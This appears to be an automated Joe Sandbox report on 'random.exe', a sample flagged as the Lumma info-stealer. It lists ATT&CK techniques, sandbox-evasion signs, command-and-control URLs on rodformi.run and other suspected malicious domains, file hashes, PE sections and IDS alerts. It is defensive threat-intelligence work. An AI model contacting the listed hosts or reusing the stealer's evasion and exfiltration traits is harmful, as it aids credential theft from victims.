Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP

      Remote Access Functionality

Source: Yara match, File source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1046421738.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Windows Management Instrumentation (12), Scheduled Task/Job, At, Cron, Launchd
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (44), Process Injection (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Security Software Discovery (851), Virtualization/Sandbox Evasion (44), Process Discovery (2), File and Directory Discovery (1), System Information Discovery (223)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System (31), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact
Behavior Graph (ID 1654467, sample random.exe, start date 02/04/2025, architecture WINDOWS, score 100): process random.exe started; network contacts: rodformi.run (172.67.197.67, ports 443, 49681, 49682, CLOUDFLARENETUS, United States), pki-goog.l.google.com, and 2 other IPs or domains; top-level signatures: Suricata IDS alerts for network traffic, Found malware configuration, Antivirus detection for URL or domain, 7 other signatures; process signatures: Detected unpacking (changes PE section rights), Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines), Query firmware table information (likely to detect VMs), 9 other signatures.

Source | Detection | Scanner | Label
random.exe | 60% | Virustotal |
random.exe | 69% | ReversingLabs | Win32.Trojan.LummaStealer
random.exe | 100% | Avira | TR/Crypt.XPACK.Gen
SAMPLE | 100% | Joe Sandbox ML |
      No Antivirus matches
Source | Detection | Scanner | Label
https://rodformi.run/aUosozc | 100% | Avira URL Cloud | malware
https://rodformi.run:443/aUosozages | 100% | Avira URL Cloud | malware
https://rodformi.run/cV | 100% | Avira URL Cloud | malware
https://rodformi.run/4 | 100% | Avira URL Cloud | malware
https://rodformi.run/d | 100% | Avira URL Cloud | malware
https://rodformi.run:443/aUosoz | 100% | Avira URL Cloud | malware
https://rodformi.run/1 | 100% | Avira URL Cloud | malware
https://rodformi.run:443/aUosozc | 100% | Avira URL Cloud | malware

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
rodformi.run | 172.67.197.67 | true | false | | high
pki-goog.l.google.com | 142.250.80.35 | true | false | | high
c.pki.goog | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
starcloc.bet/GOksAo | false | | high
spacedbv.world/EKdlsk | false | | high
metalsyo.digital/opsa | false | | high
navstarx.shop/FoaJSi | false | | high
https://rodformi.run/aUosoz | false | | high
galxnetb.today/GsuIAo | false | | high
targett.top/dsANGt | false | | high
advennture.top/GKsiio | false | | high
rodformi.run/aUosoz | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/ac/?q= | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://rodformi.run/4 | random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rodformi.run/aUosozc | random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rodformi.run/1 | random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr | random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64 | random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg | random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://rodformi.run:443/aUosozages | random.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/v20 | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700 | random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtabv20 | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi | random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://rodformi.run:443/aUosoz | random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://rodformi.run/d | random.exe, 00000000.00000003.1150577015.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151808021.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta | random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | random.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://rodformi.run:443/aUosozc | random.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1112992476.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gemini.google.com/app?q= | random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://rodformi.run/ | random.exe, random.exe, 00000000.00000003.1061957964.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150577015.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151808021.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://rodformi.run/cV | random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.197.67 | rodformi.run | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1654467
Start date and time: 2025-04-02 11:32:25 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: random.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.95.31.18
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target random.exe, PID 6208 because there are no executed functions
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:33:22 | API Interceptor | 7x Sleep call for process: random.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.197.67 | install.exe | malicious | LummaC Stealer, Xmrig
172.67.197.67 | OneProtect.exe | malicious | Xmrig
172.67.197.67 | wow_6262_build9.exe | malicious | LummaC Stealer
172.67.197.67 | PositionLoader.exe | malicious | LummaC Stealer
172.67.197.67 | https://rodformi.run/aUosoz | malicious | Unknown
172.67.197.67 | Setup.exe | malicious | LummaC Stealer
Match | Associated Sample Name / URL | Detection | Threat Name | Context
rodformi.run | L6qFGFpZpp.exe | malicious | LummaC Stealer | 104.21.52.83
rodformi.run | qWR3lUj.exe | malicious | LummaC Stealer | 104.21.52.83
rodformi.run | zzX3PUhPOA.exe | malicious | LummaC Stealer | 104.21.52.83
rodformi.run | install.exe | malicious | LummaC Stealer, Xmrig | 172.67.197.67
rodformi.run | OneProtect.exe | malicious | Xmrig | 172.67.197.67
rodformi.run | https://rodformi.run/aUosoz | malicious | Unknown | 104.21.52.83
rodformi.run | wow_6262_build9.exe | malicious | LummaC Stealer | 172.67.197.67
rodformi.run | bprz1VA.exe | malicious | Python Stealer, Blank Grabber, LummaC Stealer | 104.21.52.83
rodformi.run | random.exe | malicious | Amadey, LummaC Stealer, SheetRat | 104.21.52.83
rodformi.run | file.exe | malicious | LummaC Stealer | 104.21.52.83
bg.microsoft.map.fastly.net | NVIDIA.exe | malicious | PureCrypter, AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | 3UQbvgGmir.exe | malicious | AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | qWR3lUj.exe | malicious | LummaC Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | index.exe | malicious | PureCrypter, AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | a.ps1 | malicious | PureCrypter, AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | NVIDIA.exe | malicious | PureCrypter, AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | a.ps1 | malicious | PureCrypter, AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | index.exe | malicious | PureCrypter, AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | PO-GST-20250401.vbs | malicious | Remcos | 199.232.210.172
bg.microsoft.map.fastly.net | Swift_Payment ___Receipt.vbs | malicious | Unknown | 199.232.210.172
pki-goog.l.google.com | NVIDIA.exe | malicious | PureCrypter, AsyncRAT | 142.251.35.163
pki-goog.l.google.com | a.ps1 | malicious | PureCrypter, AsyncRAT | 142.250.81.227
pki-goog.l.google.com | PO-GST-20250401.vbs | malicious | Remcos | 142.251.32.99
pki-goog.l.google.com | REQUEST FOR PRICE QUOTATION FOR THE REVISED ITEMS.exe | malicious | Unknown | 142.250.65.227
pki-goog.l.google.com | cz4ZwB7N4G.exe | malicious | Unknown | 142.250.80.99
pki-goog.l.google.com | https://maltese.com.br/share-sensitive-files-securely/ | malicious | HTMLPhisher | 142.250.80.35
pki-goog.l.google.com | uninstall.exe | malicious | Unknown | 142.250.65.227
pki-goog.l.google.com | VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm | malicious | Unknown | 142.250.65.163
pki-goog.l.google.com | cRDJEdXHDo.dll | malicious | Unknown | 142.251.40.131
pki-goog.l.google.com | install.exe | malicious | LummaC Stealer, Xmrig | 142.250.81.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | PQPYAYJJ.exe | malicious | Amadey | 172.67.184.191
CLOUDFLARENETUS | L6qFGFpZpp.exe | malicious | LummaC Stealer | 104.21.52.83
CLOUDFLARENETUS | qWR3lUj.exe | malicious | LummaC Stealer | 104.21.52.83
CLOUDFLARENETUS | zzX3PUhPOA.exe | malicious | LummaC Stealer | 104.21.52.83
CLOUDFLARENETUS | EdnFwO343A.exe | malicious | LummaC Stealer | 104.21.16.1
CLOUDFLARENETUS | https://maxenerwellness.com/ | malicious | Unknown | 104.17.24.14
CLOUDFLARENETUS | yuioiuy.txt.ps1 | malicious | Unknown | 104.21.78.10
CLOUDFLARENETUS | https://maxenerwellness.com/ | malicious | Unknown | 104.17.24.14
CLOUDFLARENETUS | cfr4.txt.ps1 | malicious | Unknown | 172.67.202.129
CLOUDFLARENETUS | xd.arm7.elf | malicious | Mirai | 162.158.203.51
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | L6qFGFpZpp.exe | malicious | LummaC Stealer | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | qWR3lUj.exe | malicious | LummaC Stealer | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | zzX3PUhPOA.exe | malicious | LummaC Stealer | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | EdnFwO343A.exe | malicious | LummaC Stealer | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | yuioiuy.txt.ps1 | malicious | Unknown | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | cfr4.txt.ps1 | malicious | Unknown | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | random.exe | malicious | LummaC Stealer | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | 5AzgNwCtN5.exe | malicious | CryptOne, LummaC Stealer | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | 7H9CCIVPzr.exe | malicious | Unknown | 172.67.197.67
a0e9f5d64349fb13191bc781f81f42e1 | pTe9lVT8R3.exe | malicious | LummaC Stealer | 172.67.197.67
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.950328239879898
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: random.exe
File size: 1'872'896 bytes
MD5: 7ddd1b8a415abf939fff535a63d55852
SHA1: 002af611d08da05678b2ffa2e71f35301c686d39
SHA256: 1afecee6b536d098ca5d3a7d594b200f7a2126349de4cad9ff0be2b78dba9e68
SHA512: 7a6bd5307d1d6528723cb1ffb16ff717b0a852062db170fd288af110a0a676b83ec6a3c570c6b60697d184a8e51be72f12ff75de9182ce13da2d76883698be7b
SSDEEP: 49152:TRgI+Xl4LXkqFZOsYW+7T1GzjcXotrIwslJv1xsE/DRtqIv7SQT:TSIGlGORHJ4W3lJv17z17S
TLSH: D285332238E76E5FCFF845345B02F284E6E9B7BD850262E953D4862D4C427F62182B37
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....T.g..............................I...........@...........................I...........@.................................W...k..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x89a000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67E75486 [Sat Mar 29 02:01:42 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007FA8D8D2276Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x388 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x611f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x1000 | 0x5f000 | 0x2e000 | 430e1cb1a11feba67e7ce3a59f4cca10 | False | 0.9984926970108695 | data | 7.97933591893857 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x60000 | 0x388 | 0x400 | c4864e7dfce9ba19b9743f508300cefa | False | 0.4560546875 | data | 5.478110944409358 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x61000 | 0x1000 | 0x200 | f47b289bcee0e13a937cc29db13607bf | False | 0.150390625 | data | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(blank) | 0x62000 | 0x29f000 | 0x200 | e76affc0a80db1562509ea25dc64c05e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zqekczog | 0x301000 | 0x198000 | 0x197400 | 8dd6e5b4b948bb0b13280128fe10b999 | False | 0.994402600329957 | data | 7.95352697603957 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
annrbsan | 0x499000 | 0x1000 | 0x600 | 337a9e0390dd0c8f33d97f3590c0b593 | False | 0.5279947916666666 | data | 4.777826419687185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x49a000 | 0x3000 | 0x2200 | d64721feefab81f9439f5b974a03436f | False | 0.0642233455882353 | DOS executable (COM) | 0.7981725059123979 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x60058 | 0x330 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.4987745098039216
DLL | Import
kernel32.dll | lstrcpy


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-02T11:33:22.078124+0200 | 2061213 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rodformi .run) | 1 | 192.168.2.10 | 61553 | 1.1.1.1 | 53 | UDP
2025-04-02T11:33:22.423321+0200 | 2061214 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI | 1 | 192.168.2.10 | 49681 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:22.423321+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49681 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:24.103861+0200 | 2061214 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI | 1 | 192.168.2.10 | 49682 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:24.103861+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49682 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:25.611142+0200 | 2061214 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI | 1 | 192.168.2.10 | 49683 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:25.611142+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49683 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:26.746905+0200 | 2061214 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI | 1 | 192.168.2.10 | 49684 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:26.746905+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49684 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:28.649049+0200 | 2061214 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI | 1 | 192.168.2.10 | 49685 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:28.649049+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49685 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:29.859098+0200 | 2061214 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI | 1 | 192.168.2.10 | 49686 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:29.859098+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49686 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:31.717847+0200 | 2061214 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI | 1 | 192.168.2.10 | 49687 | 172.67.197.67 | 443 | TCP
2025-04-02T11:33:31.717847+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49687 | 172.67.197.67 | 443 | TCP
• Total Packets: 101
• 443 (HTTPS)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 11:33:22.212400913 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:22.212455988 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
